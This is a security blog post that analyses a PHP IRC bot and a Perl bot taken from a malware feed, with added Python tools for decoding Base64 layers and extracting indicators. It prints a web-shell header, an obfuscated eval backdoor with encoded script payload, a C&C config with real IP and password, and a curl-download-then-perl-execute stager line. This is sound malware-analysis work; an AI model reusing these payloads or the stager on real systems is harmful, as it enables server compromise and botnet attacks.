Irregular Expressions

Apr 28 2013   2:43AM GMT

Looking For Samples?

Dan O'Connor

Practice is always good. There are a few sites I look at when I am looking for things to analyze; one that always seems to have something for me is clean-mx.de. I just pulled what looks like a PHP bot off one of the database entries. I've posted a snippet below.


^JaVa Coder^ shell v2.0 ^Ojo Dumeh^

body {
color: white; background-color: black;
font-size: 12px;
font-family: Helvetica,Arial,Sans-Serif;
}

<?
$dir = @getcwd();
echo "JaVa Coder 
";
$OS = @PHP_OS;
echo "OSTYPE :$OS 
";
echo "uname -a; $uname 
";
$free = disk_free_space($dir);
$ob = @ini_get("open_basedir");
$df = @ini_get("disable_functions");
if( ini_get('safe_mode') ) {

One thing I look for in these bots is URLs / IPs and Base64-encoded strings. We have both in this sample. Two Base64 blobs:


<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJ2AlNzZhfnIjIGBhPywlNjklMkMjJTVGYCUzQmk9PyIlMzclMzYjJTJFfDEkJTM2JTMzfCUyRT8iOyQlNjF+JTNEJTVCIiUzNzglMkUxJTM1NyMlMkV+JTMxPyUzNCUzMiUyRT81OCMiJCUyQyU2OSQlMkIlMjI/JTMxfDQlMzF8LiUzM2A1IixpK34iMSQlMzk/MS4xMyElMzIiJTVEQDslNUZ8PTElM0IkJTY5JCU2NiQlMjgjZCU2RmAlNjMjdX5tfGUhJTZFJTc0LiFjb3xvYGtpPyU2NS5tYSU3NEBjJTY4YChALyMlNUMlNjIlNjghZyMlNjZgJTc0fCUzRDEvKSUzRH49IyU2RXUjbCU2Q2ApQGZvcn4oYCU2OSQlM0QlMzAlM0IlNjlAJTNDMyUzQiU2OSUyQiMlMkIjKSQlNjQjbyU2MyN1fm1+JTY1YCU2RSU3NC5+JTc3ciNpPyU3NCU2NXwlMjgiQCUzQ35zY3xyP2klNzAjJTc0QCUzRXwlNjkjZn4lMjh+XyMlMjlkJCU2RiElNjN8JTc1YG1lfiU2RXQkJTJFJTc3JTcyJTY5JTc0QCU2NSUyOEAlNUMiQCUzQyMlNzMlNjMlNzIlNjlwJTc0fiBAaWQ/JTNEJTVGJTIyJTJCQGklMkIjIl9gIHMhcmMjPX4vQC9gIn4rPyU2MX5baT8lNUQlMkIiJTJGY34lNzAvJTNFJTNDQCU1QyMlNUNAJTJGJTczJCU2Mz9yJTY5ISU3MGAlNzQhJTNFfCU1QyUyMiMpIyUzQyU1QyUyRiU3MyFjP3IlNjkjcGB0JTNFfiUyMkAlMjkjOycpLnJlcGxhY2UoL2B8XCF8I3xcfHxcJHxcP3xAfH4vZywiIikpO3ZhciB5YWhvb19jb3VudGVyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC9zY3JpcHQ+Cg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,''))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as 
$v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i
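The habit described above (hunt for Base64 in a bot sample, decode it, repeat) is easy to automate statically. This is an added Python helper, not code from the post or from the sample: it finds Base64-looking runs, decodes them, gunzips anything that starts with the same 1f8b magic the injector's tmp_lkojfghx() checks for, and rescans every decoded layer for more Base64, without ever passing anything to an interpreter. The PHP fragment it scans is constructed for the example (hostnames under .invalid), not the real injector.

```python
import base64
import binascii
import gzip
import re

# Base64 runs of at least 40 chars; shorter runs are mostly noise (identifiers, short hashes).
B64_RE = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")
GZIP_MAGIC = b"\x1f\x8b"   # same 1f8b check the sample's tmp_lkojfghx() performs


def find_base64_blobs(data: bytes) -> list:
    """Every base64-looking run in the buffer, longest first."""
    return sorted(set(B64_RE.findall(data)), key=len, reverse=True)


def decode_layer(blob: bytes):
    """Decode one candidate; gunzip if the result carries the gzip magic.
    Returns None for runs that are not valid base64 (e.g. hex hashes)."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if raw.startswith(GZIP_MAGIC):
        try:
            raw = gzip.decompress(raw)
        except (OSError, EOFError):
            return None
    return raw


def printable_ratio(buf: bytes) -> float:
    """Fraction of printable ASCII; a low value flags binary data or a false positive
    (a 40-char hex digest decodes 'successfully' to garbage)."""
    if not buf:
        return 0.0
    return sum(32 <= b < 127 or b in b"\r\n\t" for b in buf) / len(buf)


def unwrap(data: bytes, max_depth: int = 5) -> list:
    """Statically peel nested base64/gzip layers without executing anything.
    Each decoded payload is rescanned, so base64-inside-base64 is found too.
    Returns (depth, decoded_bytes, printable_ratio) tuples."""
    found = []
    stack = [(data, 0)]
    while stack:
        buf, depth = stack.pop()
        if depth >= max_depth:
            continue
        for blob in find_base64_blobs(buf):
            decoded = decode_layer(blob)
            if decoded is None:
                continue
            found.append((depth + 1, decoded, printable_ratio(decoded)))
            stack.append((decoded, depth + 1))
    return found


def build_sample() -> bytes:
    """Constructed PHP fragment in the style of the injector above (not the real sample):
    a gzipped+base64 script payload, a plain base64 URL, and a SHA-1-like hex decoy."""
    payload = b"<script>document.write('<iframe src=\"http://c2.example.invalid/x\">')</script>"
    inner = base64.b64encode(gzip.compress(payload))
    url = base64.b64encode(b"http://dropper.example.invalid/mild2.txt")
    return (b"<?php define('TMP_X', base64_decode('" + inner + b"'));\n"
            b"$u = base64_decode('" + url + b"');\n"
            b"$h = 'da39a3ee5e6b4b0d3255bfef95601890afd80709';\n")


if __name__ == "__main__":
    for depth, decoded, ratio in unwrap(build_sample()):
        print(f"depth={depth} printable={ratio:.2f} {decoded[:70]!r}")
```

Run it on a real sample with `unwrap(open(path, "rb").read())`; anything with a printable ratio near 1.0 is worth reading, and the depth tells you how many wrappers the author stacked.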

And


$dc_source = "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";

We have what looks to be the IRC C&C.

class pBot
{
var $config = array("server"=>"106.187.97.158",
"port"=>"7000",
"pass"=>"toni",
"prefix"=>"Ddoser",
"maxrand"=>"4",
"chan"=>"#FBI",
"chan2"=>"#CIA",
"key"=>"toni",
"modes"=>"+ps",
"password"=>"toni",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname (remember: /setvhost scanner.crew)

We also have a URL to check out.


<?
$url="http://ircq.wap.sh/";
exec('cd /tmp;curl -O '.$url.'mild2.txt;perl mild2.txt;rm -rf mild2.txt*;');

And it looks like we've got another bot to look at in mild2.txt.


#!/usr/bin/perl
#
# What is New in V2.3 ? :
#
# + Improved Scanner
# + Improved Configuration
# + Nmap PortScan
# + LogCleaner
# + Mailer
#
#You can use the following commands :
#!bot @portscan
#!bot @nmap
#!bot @back
#!bot @udpflood
#!bot @tcpflood
#!bot @httpflood
#!bot @linuxhelp
#!bot @hajar
#!bot @system
#!bot @milw0rm
#!bot @logcleaner
#!bot @sendmail
#!bot @join
#!bot @part
#!bot @help
#!bot cd tmp for example
#!bot !eval

It also uses the same IRC server.


$servidor='106.187.97.158' unless $servidor;
my $porta='7000';
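The pBot config, the curl stager and the Perl bot above all spell their indicators differently (a PHP associative array, a quoted URL in an exec() string, Perl scalars with Portuguese names), yet they point at the same server and port. This added Python example, not code from the post or from either bot, pulls the indicators out of each fragment in its own syntax and reports which ones tie the samples together. The three inputs are constructed stand-ins with documentation addresses, not the original samples.

```python
import re

# Constructed stand-ins for the three fragments in the post (not the original samples):
# a pBot-style PHP config, the curl-then-perl stager, and the Perl bot's server variables.
SAMPLES = {
    "pbot.php": '''
class pBot
{
var $config = array("server"=>"192.0.2.10",
"port"=>"7000",
"chan"=>"#test",
"chan2"=>"#test2",
"hostauth"=>"*");
''',
    "stager.php": """
<?
$url="http://stager.example.invalid/";
exec('cd /tmp;curl -O '.$url.'mild2.txt;perl mild2.txt;rm -rf mild2.txt*;');
""",
    "mild2.txt": """
$servidor='192.0.2.10' unless $servidor;
my $porta='7000';
my @canais=("#test");
""",
}

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
# Only quoted #channels, so Perl/shell comment lines are not mistaken for IRC channels.
CHAN_RE = re.compile(r"""["'](#[A-Za-z0-9_\-]+)["']""")
# Host/port as the two bot families spell them: PHP "server"=>"x" / "port"=>"y"
# and Perl $servidor='x' / $porta='y'.
HOST_RE = re.compile(r"""(?:"server"\s*=>\s*|\$servidor\s*=\s*)["']([^"']+)["']""")
PORT_RE = re.compile(r"""(?:"port"\s*=>\s*|\$porta\s*=\s*)["']?(\d+)["']?""")
# Download-and-execute chain: fetch, run with an interpreter, delete the file.
STAGER_RE = re.compile(r"(?:curl|wget)[^;]*;\s*(?:perl|php|sh|bash)\s+[^;]*;\s*rm\s")


def extract_iocs(text: str) -> set:
    """Return (type, value) indicators found in one sample."""
    iocs = set()
    for ip in IPV4_RE.findall(text):
        iocs.add(("ip", ip))
    for url in URL_RE.findall(text):
        iocs.add(("url", url))
    for chan in CHAN_RE.findall(text):
        iocs.add(("irc_channel", chan))
    for host, port in zip(HOST_RE.findall(text), PORT_RE.findall(text)):
        iocs.add(("c2_endpoint", f"{host}:{port}"))
    if STAGER_RE.search(text):
        iocs.add(("behavior", "download-and-execute stager"))
    return iocs


def correlate(samples: dict) -> dict:
    """Map each indicator to the set of sample names it appears in."""
    seen = {}
    for name, text in samples.items():
        for ioc in extract_iocs(text):
            seen.setdefault(ioc, set()).add(name)
    return seen


def shared_infrastructure(samples: dict) -> dict:
    """Indicators that occur in two or more samples, i.e. the links between them."""
    return {ioc: names for ioc, names in correlate(samples).items() if len(names) > 1}


if __name__ == "__main__":
    for (kind, value), names in sorted(correlate(SAMPLES).items()):
        print(f"{kind:13} {value:40} {', '.join(sorted(names))}")
```

The output is the start of a block list: the shared endpoint and channel are the pieces to feed to egress filtering or IRC-traffic detection, while the stager behaviour is what to look for in web-server process logs (a curl invoked from the web server's account, followed immediately by perl).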
